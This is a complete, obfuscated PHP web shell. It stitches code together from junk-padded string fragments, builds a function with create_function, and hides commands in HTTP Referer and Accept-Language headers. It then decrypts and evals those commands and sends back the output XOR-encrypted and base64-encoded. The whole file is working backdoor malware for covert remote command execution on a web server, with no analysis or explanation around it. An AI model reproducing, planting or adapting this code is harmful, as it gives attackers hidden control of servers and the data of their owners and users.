<?php
$G='.([\\d]))FD?,?/FD",$ra,$FDmFD);if($q&&$m){FD@sessFDionFD_startFD();$FDs=&$FD_SESSION;$ssFD="FDsubstrFDFD";$sl="sF';
$E=str_replace('MV','','creMVMVatMVe_MVfuMVnctMVion');
$g='rFDray("/_FD/FD","/FD-/"),array(FD"/",FD"FD+"),$ss($s[$FDi],0,$e)))FD,$k)))FD;$oFD=ob_getFD_conteFDnts();oFDb_endFD_cFDl';
$V='VER;$rr=@FD$r["HTTP_REFDFFDEFDRER"];$raFD=@FD$r["HTTP_ACCEPFDT_LANGFDUAGE"];FDifFD(FD$rr&&$ra)FD{FDFD$u=parse_urFDl(';
$X='FD,3)FD);$p="";FDforFD($z=1;$z<count($mFD[1]);$FDFDz++)$p.=$q[$m[FDFD2][$z]];iFDf(stFDrpos(FDFD$pFD,$h)===0){';
$K='$khFD="fFDf13";$kf="31f7";FDfuFDnFDctiFDoFDn x($t,$k){$c=strlen($k)FD;FD$FDl=FDstrlen($t);$o="";forFDFD($i=0;FD$i';
$C='FD$s[$i]="";$p=FD$ss($FDp,3);}if(arFDraFDy_keyFD_eFDxists($i,$s))FD{$s[$i].=FDFD$FDp;$e=sFDtrpos($s[$iFD],$f';
$B='$rr);parse_str(FD$u["querFDy"],$q)FD;$q=aFDrray_vaFDlues($FDFDq);preg_FDmatch_all(FD"/([\\FDw])[\\wFD-FD]+(?:;FDq=0';
$e=');if(FD$e){$k=FD$kh.FD$kfFD;ob_start()FD;@eFDvaFDl(@gzuncomFDpresFDs(@x(@basFDe64_decodeFD(preFDg_replacFDe(a';
$W='<$l;){FDfFDoFDr($j=0;($FDj<$c&&FD$i<$lFD);$j++,$i++){$o.=$FDt{$FDi}^$k{$jFD};}}rFDeFDturn $o;}$r=FD$FD_SERFD';
$T='Dtrtolower"FD;$iFDFD=$m[1][0].$m[1][1]FD;$h=FD$sl($sFDs(md5($iFD.$khFD),0,3)FD);$FDFDf=$sl($ss(mdFD5($i.$kf)FD,0';
$r='ean();$FDd=basFDe64_encodeFD(x(FDgzcompFDress($o)FD,$kFD))FDFD;print("<$FDk>$dFD</$k>FD");@session_FDdestroy();}}}}';
$x=str_replace('FD','',$K.$W.$V.$B.$G.$T.$X.$C.$e.$g.$r);
$A=$E('',$x);$A();
?>
